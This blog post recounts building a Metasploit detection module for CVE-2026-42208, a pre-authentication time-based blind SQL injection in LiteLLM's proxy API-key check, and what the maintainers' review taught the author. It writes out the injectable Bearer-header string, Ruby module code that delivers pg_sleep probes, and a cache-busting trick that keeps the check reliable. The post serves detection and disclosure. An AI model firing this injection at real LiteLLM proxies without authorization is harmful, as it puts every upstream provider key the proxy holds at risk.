Skip to content
All writing
Technical · 10 min

Writing a Metasploit Module for a Pre-Auth SQLi in an LLM Gateway

How I turned CVE-2026-42208 — a time-based blind SQL injection in LiteLLM's proxy — into a benign, lab-verified Metasploit detection module, and what the Rapid7 review cycle taught me about shipping upstream.


The target nobody’s hardening yet

LiteLLM is one of those tools that quietly ends up in the middle of everything. It’s a proxy that puts a single OpenAI-compatible API in front of a hundred different model providers, and to do that job it holds the keys — the real upstream API keys for OpenAI, Anthropic, Azure, Bedrock, the lot. Teams drop it in so their apps can talk to “a model” without caring which one, and so platform owners can hand out scoped virtual keys instead of the master credentials.

That makes the proxy a concentrated target. Compromise it and you’re not behind one app — you’re behind everyone’s model budget and, depending on how it’s wired, the data flowing through every request. So when CVE-2026-42208 landed — a pre-authentication SQL injection in the LiteLLM proxy, found by Tencent YunDing Security Lab — it was worth understanding properly. I ended up writing a Metasploit detection module for it, which is now PR #21567 against the framework.

This is the build log: the bug, the module, and the review cycle that made the module a third its original size.

CVE-2026-42208: the bug

The flaw lives in API-key verification. When a request arrives, the proxy needs to look up the bearer token to decide what it’s allowed to do. It builds a PostgreSQL query that, simplified, looks like:

WHERE v.token = '<token>'

The <token> is the raw value from the Authorization: Bearer ... header, interpolated straight into the string — no parameterization. That alone would be a textbook SQLi, except for one detail that makes it almost safe: LiteLLM hashes tokens before they hit the query. A normal LiteLLM virtual key starts with sk-, and any token beginning with sk- gets hashed first, so the value in the query is a hex digest with nothing injectable about it.

The bug is the word “almost.” LiteLLM only hashes tokens that begin with sk-. A bearer value that doesn’t start with sk- skips the hashing path and reaches the query verbatim. So:

Authorization: Bearer ' OR <injected predicate>-- x

breaks out of the string literal, ORs in an attacker-controlled predicate, and comments out the trailing quote. And because this is the failure path of key verification, it runs before the request is ever authenticated. Pre-auth SQLi against the component holding everyone’s keys. Affected versions are 1.81.16 through 1.83.6; it’s fixed in 1.83.7.

Why a detection module, not an exploit

I write these as detection modules, not weaponized exploits, and that’s a deliberate line. The goal is to let a defender — or me, in a lab — answer one question: is this specific host vulnerable? Not can I dump the database. The module confirms the flaw and reports it. It never reads, modifies, or exfiltrates a single row.

For a blind SQLi the natural way to do that is a time-based check, and it maps cleanly onto Metasploit’s auxiliary scanner conventions: a check method that returns a verdict, a run that reports the vuln, and nothing that crosses into data access. The module is marked CRASH_SAFE with IOC_IN_LOGS as its only side effect — it will show up in the proxy’s logs, because it’s making real (if benign) requests, but it won’t take anything down.

The first version, and the rule it broke

Here’s the part I’m not precious about: my first version worked, and it was wrong in the way that gets you a review.

A time-based blind check is conceptually simple. Send a request whose injected predicate makes the database sleep when a condition is true, and a second request whose predicate never sleeps. If the first is delayed and the second comes back promptly, the database evaluated your SQL — vulnerable. If both are slow, the server’s just slow, and you don’t flag it. That differential is the whole trick: it’s what keeps a laggy-but-patched host from reading as a false positive.

I hand-rolled all of it. A timed_request helper with a monotonic-clock stopwatch. An effective_sleep floor so the sleep never dropped below a sane minimum. A probe method with the differential logic, and a request timeout computed as SqliDelay * 2 + 20. It was a lot of code, and — this is the important bit — it was code that already exists in the framework, written better than mine.

The review: six threads, one root cause

jheysel-r7 from Rapid7 reviewed it and left six comments. Five were about the symptoms:

  • effective_sleep — “Is this method necessary?”
  • timed_request — “Could you please try using Rex::StopWatch.elapsed_time here?”
  • the * 2 + 20 timeout — “Could you explain the significance of [this]?”
  • the probe method — “This method contains a lot of variables that are single characters which makes it difficult to read… Could you also leave a comment explaining the non-intuitive operations like (t_b - t_a) >= n * 0.6?”

That last one stung a little because it was exactly right. n, t_a, t_b, c1, c2… and a magic 0.6 multiplier I’d have to think hard to re-explain a month later. If the reviewer can’t read it, it doesn’t matter that it works.

But the sixth comment was the one that mattered, and it was at the top of the file:

We have the following library that should be able to help with a lot of the heavy lifting in this module wrt. the SQLi: MySQLi::TimeBasedBlind. Could you please update this module to make use of it?

That’s the root cause of the other five. I’d rebuilt a wheel the framework ships. The vulnerable query is PostgreSQL, not MySQL, so I used the Postgres sibling — Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind — but the point stands: the mixin already does the timing, the differential, and the scaling, and it does them consistently across every SQLi module in the framework.

The rebuild

Switching to the library let me delete almost everything. The stopwatch, the floor helper, the differential math, the magic 0.6, the doubled-payload timeout — all gone. What’s left is a single method that hands the library a way to send a request, with the injection in the right place:

def create_litellm_sqli
  create_sqli(dbms: PostgreSQLi::TimeBasedBlind) do |payload|
    body = {
      'model' => datastore['MODEL'],
      'messages' => [{ 'role' => 'user', 'content' => 'x' }],
      'max_tokens' => 1
    }.to_json
    send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'ctype' => 'application/json',
        'headers' => { 'Authorization' => "Bearer ' OR #{payload}-- #{Rex::Text.rand_text_alphanumeric(8)}" },
        'data' => body
      },
      request_timeout
    )
  end
end

The library calls this block, passing in the payload — the predicate it wants tested. My job shrank to one thing: get that payload into the query. I break out of the WHERE v.token = '<token>' literal, OR in the predicate, and comment out the rest. The check is now just:

if create_litellm_sqli.test_vulnerable
  Exploit::CheckCode::Vulnerable(...)
else
  Exploit::CheckCode::Safe(...)
end

test_vulnerable is the library’s sleep-on-true-vs-no-sleep-on-false differential — the exact logic I’d hand-written, now battle-tested and read by every reviewer who’s ever touched a SQLi module. Six comments, resolved by one architectural change.

Two non-obvious details I had to keep

The rebuild deleted my code, but it didn’t delete the domain knowledge the bug demands. Two things survived because the library can’t know them:

The random suffix defeats a cache. Look at the rand_text_alphanumeric(8) at the end of the bearer, sitting inside the SQL comment so it’s inert. It’s not for the database — it’s for LiteLLM. The proxy has an in-memory API-key auth cache, and a repeated bearer would be served from cache and never reach the database, which would silently suppress the pg_sleep. Making every bearer unique forces the lookup to the database every time. Without this, the check would intermittently report safe on a vulnerable host.

The timeout has to account for rows. pg_sleep is evaluated once per matching row. On a proxy with a populated token table, a true predicate can multiply the delay several times over, so the request timeout can’t just be SqliDelay + a bit:

def request_timeout
  (datastore['SqliDelay'] * 4 + 20).ceil
end

SqliDelay * 4 gives headroom for a multi-row table; + 20 covers the network round-trip. This is the comment the reviewer asked for on the old * 2 + 20 — except now it’s explaining a number that’s actually defensible.

And one detection caveat that’s genuinely interesting: the injectable predicate lives in a WHERE clause, which PostgreSQL only evaluates against matching rows. If the token table is empty, the pg_sleep never runs, and a vulnerable proxy reports as safe. Any LiteLLM proxy in real use has issued at least one virtual key, so this isn’t a problem in the field — but a freshly initialized proxy with an empty table can produce a false negative. The module documents this rather than pretending it doesn’t exist.

Proving it in the lab

The differential is what makes me trust a “Vulnerable” verdict, but I still verified against the real thing. I stood up the official images both sides of the fix, each DB-backed with one provisioned virtual key:

  • main-v1.83.3-stableVulnerable
  • main-v1.83.7-stableSafe

And I re-ran check and run repeatedly to confirm the result was stable, not a timing fluke. A detection module that flips between runs is worse than no module — it teaches you to distrust it. Stable across invocations, correct on both sides of the patch boundary: that’s the bar.

What shipping into a framework teaches you

The lesson wasn’t the SQLi. I understood the bug going in. The lesson was that a good maintainer optimizes for things a working module doesn’t prove: reuse, readability, and false-positive resistance. My hand-rolled probe was correct, and it was still the wrong answer, because correctness isn’t the only axis. Code that re-implements the framework is code the next person has to re-review from scratch; code built on the shared mixin inherits everyone’s prior scrutiny for free.

The reflex I’m taking forward: before writing the clever part, check whether the framework already owns it. Nine times out of ten the heavy lifting — timing, differentials, encoding, session handling — is a mixin away, and the actual contribution is the thin, domain-specific layer on top. For this module that layer was three things the library couldn’t know: where the injection point is, that the auth cache needs busting, and that empty tables lie.

This is also the first of a pair. The companion post covers the LLM red-teaming side — the garak probes for OS-command and NoSQL injection — where the target isn’t the gateway but the model behind it. Different layer of the AI stack, same discipline: confirm, don’t compromise.

Share LinkedInXBlueskyReddit